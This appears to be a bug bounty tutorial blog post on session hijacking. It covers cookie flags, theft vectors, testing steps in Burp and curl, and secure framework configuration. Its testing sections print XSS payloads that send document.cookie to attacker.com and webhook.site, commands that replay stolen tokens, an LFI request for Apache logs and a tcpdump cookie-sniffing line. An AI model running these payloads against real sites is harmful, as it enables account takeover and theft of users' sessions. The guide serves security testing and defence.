π Bug Bounty Series
Session Hijacking β
Complete Bug Bounty Guide 2026
Session Hijacking lets an attacker steal a valid session token after the victim authenticates β via XSS, network sniffing, token brute force, or URL leakage β and impersonate that user completely. Two cookie flags stop the most dangerous attacks cold.
π Table of Contents
π What is Session Hijacking?
Session Hijacking occurs when an attacker steals a valid, authenticated session token from a logged-in user and replays it to impersonate that user. The attacker does not need the victim’s password β only their session token. Once replayed, the server cannot distinguish the attacker from the legitimate user.
Session Hijacking β token stolen after authentication β replayed to impersonate victim
π‘ Core Concept
After login, your browser holds a session token β a digital VIP pass. Session Hijacking means an attacker steals your pass β via XSS, network sniffing, or guessing β and walks in using it. The server sees a valid token and lets them in. Two cookie flags β HttpOnly and Secure β block the two most common theft vectors completely.
βοΈ Session Hijacking vs Session Fixation
π The One-Line Distinction
Session Fixation: Attacker PLANTS a known session ID before the victim logs in. Pre-authentication attack.
Session Hijacking: Attacker STEALS a session token after the victim has already authenticated. Post-authentication attack.
πͺ Cookie Flags β The First Line of Defence
Before testing any complex hijacking vector, audit cookie flags. Two flags β HttpOnly and Secure β block the two most dangerous attack methods. Check them first, every time.
HttpOnly
JavaScript cannot read or write this cookie
Prevents: XSS-based cookie theft
CRITICAL β Set Always
Secure
Cookie only transmitted over HTTPS connections
Prevents: Network sniffing on HTTP
CRITICAL β Set Always
SameSite=Strict
Cookie not sent on cross-site requests at all
Prevents: CSRF, CSRF-based session abuse
HIGH β Strongly Recommended
SameSite=Lax
Cookie sent on same-site + top-level GET only
Prevents: Most CSRF attacks
HIGH β Minimum Recommended
Domain=
Exact hostname only β no leading dot wildcard
Prevents: Subdomain cookie fixation
MEDIUM β Verify Scope
Max-Age / Expires
Short session lifetime limits stolen token window
Reduces: Stolen token utility over time
HIGH β 15-30 min idle expiry
Cookie Flag Audit β What to Look For
# Check with curl: curl -I https://target.com/login # INSECURE β all flags missing: Set-Cookie: session=ABC123; Path=/ # PARTIALLY SECURE β HttpOnly only: Set-Cookie: session=ABC123; Path=/; HttpOnly # Still vulnerable to: network sniffing (missing Secure) # FULLY SECURE β all critical flags: Set-Cookie: session=ABC123; Path=/; HttpOnly; Secure; SameSite=Strict
β‘ 8 Session Hijacking Methods
π XSS Cookie Theft
Inject JS that reads and exfiltrates
document.cookie to attacker serverRequires: XSS + missing HttpOnly flag
CRITICAL
π‘ Network Sniffing
Wireshark captures session cookie in plaintext HTTP traffic on same network
Requires: HTTP page + missing Secure flag
HIGH
π’ Token Brute Force
Guess sequential or short session IDs via automated tool
Requires: Low entropy session token
HIGH
π URL / Referrer Leak
Token in URL sent via Referer header to all external resources
Requires: Session token in URL query string
HIGH
π MITM Downgrade
Force HTTP connection, intercept unencrypted session cookie
Requires: Missing HSTS + same network
HIGH
π Log File Exposure
LFI to server access log β session tokens logged in URL parameters
Requires: LFI + session ID in URL
HIGH
π CSRF Abuse
Force victim to perform actions with their own session via forged request
Requires: Missing SameSite flag + no CSRF token
MEDIUM
π¦ Malware / Extension
Malicious browser extension reads all cookies from browser storage
Requires: Victim installs malicious extension
CRITICAL
π Session Hijacking β Quick Reference Table
| Field | Details |
|---|---|
| Vulnerability | Session Hijacking |
| Also Known As | Cookie Theft, Session Token Theft, Sidejacking, Cookie Hijacking |
| OWASP | A07:2021 β Identification and Authentication Failures | CWE-613 |
| CVE Score | 6.0 β 9.8 |
| Severity | High (Critical when XSS chain or admin token stolen) |
| Root Cause | Missing HttpOnly (XSS theft) | Missing Secure (sniffing) | Token in URL | Low entropy |
| Where to Check | Cookie flags on all Set-Cookie headers | Session in URL params | Token length/entropy | HSTS header | XSS sinks |
| Best Tools | Burp Suite (Sequencer, Intruder), XSSHunter, Wireshark, curl, Python requests |
| Practice Labs | PortSwigger XSS Labs, PortSwigger Auth Labs, DVWA, HackTheBox |
| Difficulty | Beginner (flag audit) | Intermediate (XSS theft) | Advanced (MITM, brute force) |
| The Two Fixes | HttpOnly stops XSS theft. Secure stops HTTP sniffing. Set both on every session cookie. |
| Related Vulns | Session Fixation, Cross-Site Scripting (XSS), Insecure Logout |
π§ Manual Testing for Session Hijacking
Phase 1 β Cookie Flag Audit
Do This First on Every Target
1
Inspect All Session Cookies in Burp and DevTools
Burp β HTTP History β find any Set-Cookie in response headers. Or DevTools β F12 β Application β Cookies. Verify HttpOnly β, Secure β, SameSite β for every session cookie.
2
Check for Session Token in Any URL
In Burp HTTP History search for your session token value. If it appears in any URL β it leaks via the Referer header to every external resource on that page.
3
Test Session Token Entropy with Sequencer
Burp β Right-click Set-Cookie response β Send to Sequencer β Custom location β highlight token β Start capture β collect 200+ samples β Analyze. Entropy below 64 bits = weak.
Phase 2 β XSS Cookie Theft Test
XSS Cookie Theft Payloads
# Prerequisite: HttpOnly must NOT be set on session cookie # Test in browser console first: > document.cookie # Returns empty string if HttpOnly is set β XSS theft not possible # Returns cookie value β HttpOnly missing β XSS theft works! # Payload 1: Redirect-based <script>document.location='https://attacker.com/?c='+document.cookie</script> # Payload 2: Fetch-based (silent, no redirect) <script>fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie))</script> # Payload 3: Image-based (bypasses some CSP) <img src=x onerror="new Image().src='https://attacker.com/?c='+document.cookie"> # Payload 4: Blind XSS (for stored XSS in admin panels) <script src=https://YOUR_ID.xss.ht></script>
Replay the Stolen Cookie
# Token received at attacker endpoint: session=VICTIM_SESSION_ID # Replay via curl: curl -H 'Cookie: session=VICTIM_SESSION_ID' https://target.com/api/me # 200 OK with victim data = CONFIRMED Session Hijacking # Replay via browser console (new incognito window): document.cookie = 'session=VICTIM_SESSION_ID; path=/' # Refresh page β now browsing as victim
Phase 3 β Token Entropy Analysis
Identify Weak / Predictable Tokens
# Collect 5 tokens from different login sessions β compare # WEAK patterns β predictable: session=1001 β sequential integer session=dGVzdA== β Base64("test") session=1703000000 β Unix timestamp session=abc123 β only 6 chars # STRONG β cryptographically random: session=7f4a9b2e3c1d8f6e5a0b4c9d3e7f2a1b8c5d4e6f9a0b1c # 48 hex chars = 192 bits entropy = not brute-forceable # If sequential β test Burp Intruder with number range payload # If timestamp β test time-window around known login time
Phase 4 β HSTS and HTTP Transmission Check
HSTS and HTTP Exposure Test
# Check if HSTS is enforced curl -I https://target.com | grep -i strict-transport # Secure: Strict-Transport-Security: max-age=31536000; includeSubDomains # Vulnerable: (no HSTS header) β HTTP downgrade possible # Check if Secure flag prevents HTTP transmission curl -v http://target.com/api/me 2>&1 | grep -i cookie # Secure: no Cookie header sent β Secure flag working # Vulnerable: Cookie: session=ABC123 sent over HTTP β sniffable # Also test any mixed-content pages: # HTTPS site that loads some resources via HTTP # Those HTTP requests will include the session cookie if Secure not set
π€ Best Tools for Session Hijacking Testing
π¬ Burp Suite
Cookie flag audit, Sequencer for entropy, Intruder for brute force, Scanner for XSS sinks.
Right-click Set-Cookie β Send to Sequencer β analyze entropy
π― XSSHunter
Blind XSS platform β captures cookies, URL, DOM, and screenshot when XSS fires in admin panel.
xsshunter.trufflesecurity.com β get payload URL
π Wireshark
Capture HTTP traffic to intercept plaintext session cookies on unencrypted connections.
Filter: http.cookie β shows all transmitted cookies
π curl
Quick flag check, session replay testing, confirm token validity across different contexts.
curl -I URL | grep Set-Cookie
π Python
Automate token entropy comparison, sequential brute force, cookie flag auditing at scale.
requests.get(url, cookies={'session': stolen_token})
π₯οΈ DevTools
Application β Cookies β visually audit HttpOnly, Secure, SameSite for all cookies at once.
F12 β Application β Cookies β check all columns
π₯ Burp Suite β Session Hijacking Guide
1
Audit Cookie Flags in HTTP History
HTTP History β click any authenticated response β Headers tab β find Set-Cookie β verify HttpOnly, Secure, SameSite present. Missing any = report immediately.
2
Sequencer β Analyse Token Entropy
Right-click any Set-Cookie response β Send to Sequencer β Custom Location β highlight token value β Start Live Capture β collect 200+ samples β Analyse Now. Below 64 bits effective entropy = weak.
3
Intruder β Brute Force Predictable Tokens
Capture GET /api/me β Intruder β mark
Β§sessionΒ§ β Payload: Numbers (sequential range) or Wordlist β Start Attack β sort by response length β hits are valid sessions.4
Active Scan β Find XSS for Cookie Theft Chain
Right-click target β Scan β Active Scan β look for XSS alerts. If XSS found and HttpOnly missing β escalate to Critical by demonstrating cookie theft.
π£ Advanced Session Hijacking Techniques
XSS + Missing HttpOnly β Critical Account Takeover Chain
Full XSS Cookie Theft Chain
# Step 1: Confirm HttpOnly missing Set-Cookie: session=ABC123; Path=/ β no HttpOnly! # Step 2: Find XSS injection point on target # Stored XSS in profile bio, username, support ticket etc. # Step 3: Inject payload <script> fetch('https://webhook.site/YOUR_ID?c='+document.cookie, {method:'GET', mode:'no-cors'}) </script> # Step 4: Wait for admin/victim to view the page # Step 5: Receive at webhook.site: # c=session=VICTIM_ADMIN_SESSION_TOKEN # Step 6: Replay in new incognito browser curl -H 'Cookie: session=VICTIM_ADMIN_SESSION_TOKEN' \ https://target.com/api/admin/users # Full admin access = Critical severity + maximum bounty
Log File Exposure + Session Token Extraction
LFI β Log File β Mass Session Replay
# If LFI exists AND session tokens are in URL # Step 1: Read server access log via LFI GET /view?file=../../../../var/log/apache2/access.log # Step 2: Log entries reveal session tokens in URLs: 192.168.1.5 - - [01/Jan] "GET /dashboard?session=USER1_TOKEN" 203.0.113.1 - - [01/Jan] "GET /dashboard?session=ADMIN_TOKEN" # Step 3: Replay ADMIN_TOKEN curl -H 'Cookie: session=ADMIN_TOKEN' https://target.com/api/me # Instant admin access β session stolen from log file # Prevention: Never log session tokens # Apache: LogFormat without %q or mask sensitive params
Firesheep-Style Network Sidejacking (Same Network)
Network Sniffing Demonstration
# For authorised penetration tests on controlled environments only # If target has ANY HTTP pages and Secure flag is missing: # Option 1: Wireshark on shared network # Filter: http.cookie # Captures: Cookie: session=PLAINTEXT_TOKEN from any HTTP request # Option 2: tcpdump tcpdump -i eth0 -A 'tcp port 80' | grep -i 'cookie:' # Option 3: Test HTTP transmission directly curl -v http://target.com/api/me 2>&1 | grep Cookie # Cookie: session=ABC123 transmitted in plaintext = CONFIRMED # Prevention: Secure flag + HSTS + redirect all HTTP to HTTPS
π Real Session Hijacking Bug Chains
XSS + Missing HttpOnly β Admin Session Stolen β RCE
Stored XSS fires in admin panel β document.cookie exfiltrated (HttpOnly missing) β admin session replayed β file upload feature β PHP shell β Remote Code Execution
CRITICAL π°
HTTP Page + Missing Secure β Coffee Shop Sidejacking
Site has one HTTP page β Secure flag missing β Wireshark captures Cookie: session=ABC123 β attacker replays token β full account access from passive sniff
HIGH π°
Sequential Session ID β Mass Account Compromise
Session token is user ID as integer β Burp Intruder tries 1000β9999 β hundreds of valid sessions found β mass account access without any credentials
CRITICAL π°
LFI + Session in URL β All Tokens from Log File
LFI vulnerability + session tokens in URL β read /var/log/apache2/access.log β hundreds of valid sessions extracted β mass account replay from single file
CRITICAL π°
Session in URL β Referrer Leak β Third-Party Theft
Session token in URL β page includes Google Analytics β browser sends Referer: /dashboard?session=TOKEN β Google receives session token β third-party log exposure
HIGH π°
Session Hijacking + IDOR β Mass Data Breach
Steal one admin session via XSS β use token to access /api/admin/export β combine with IDOR to enumerate all user IDs β full database export
CRITICAL π°
π‘οΈ Defense Against Session Hijacking
β
The Two Mandatory Flags
Set HttpOnly on every session cookie β blocks XSS-based theft permanently. Set Secure on every session cookie β blocks HTTP sniffing permanently. These two lines of configuration eliminate the two most dangerous and common attack vectors.
Secure Cookie Configuration β All Frameworks
# PHP β php.ini or runtime session.cookie_httponly = 1 session.cookie_secure = 1 session.cookie_samesite = "Strict" session.use_only_cookies = 1 β prevents URL session IDs session.use_trans_sid = 0 β prevents session in URL # Node.js / Express app.use(session({ secret: process.env.SESSION_SECRET, resave: false, saveUninitialized: false, cookie: { httpOnly: true, β blocks XSS theft secure: true, β HTTPS only sameSite: 'strict', β blocks CSRF maxAge: 900000 β 15 minutes idle } })); # Django β settings.py SESSION_COOKIE_HTTPONLY = True SESSION_COOKIE_SECURE = True SESSION_COOKIE_SAMESITE = 'Strict' SECURE_HSTS_SECONDS = 31536000 β enforce HSTS
π Session Security Checklist
β HttpOnly on ALL session cookies β no exceptions
β Secure on ALL session cookies β no HTTP transmission
β SameSite=Strict β prevents CSRF-based session abuse
β HSTS enforced β prevents HTTP downgrade attacks
β Session tokens never appear in URLs
β Token entropy: 128-bit minimum (use crypto.randomBytes or os.urandom)
β Session expiry: 15β30 min idle, 8β24 hr absolute maximum
β Session tokens never logged β mask in all log output
β Regenerate session ID after every authentication event
β Invalidate all sessions on logout and password change
π Learn More β External Resources
π PortSwigger β XSS Labs (Cookie Theft)
π OWASP β Session Hijacking Reference
π OWASP Session Management Cheat Sheet
π XSSHunter β Blind XSS Capture Platform
π More from devtechnoblog.in
π Session Fixation β Complete Bug Bounty Guide
π Cross-Site Scripting (XSS) Guide
π Insecure Logout Guide
π Authentication Bypass Guide
π§ Key Takeaways β Session Hijacking
- Session Hijacking steals tokens AFTER authentication (vs fixation which plants them BEFORE)
- Check HttpOnly and Secure flags FIRST β two flags that block the two most dangerous vectors
- Missing HttpOnly + XSS = instant Critical chain β always check cookies when you find XSS
- Any session token in a URL will leak via Referer header to every external resource on the page
- Run Burp Sequencer on every session token β effective entropy below 64 bits = brute-forceable
- Check HSTS header β missing HSTS enables HTTP downgrade β session sniffable on any network
- Combine LFI + session in URL to read server access logs and extract mass session tokens
- Use XSSHunter for blind XSS β fires when admin views a stored payload and sends their cookie
- Session token expiry matters β 30-day stolen token = critical; 15-min token = much lower impact
- Three-step PoC: (1) exploit theft vector, (2) receive token, (3) use token in new browser β show /api/me data
π Firesheep β The Tool That Changed the Web
In 2010, Firesheep β a Firefox extension β let anyone on public WiFi click once to steal sessions from Facebook, Twitter, and dozens of other sites. It required zero hacking skill. The root cause: cookies transmitted over HTTP without the Secure flag. Firesheep forced the entire internet to implement HTTPS by default. Two flags changed web security forever.
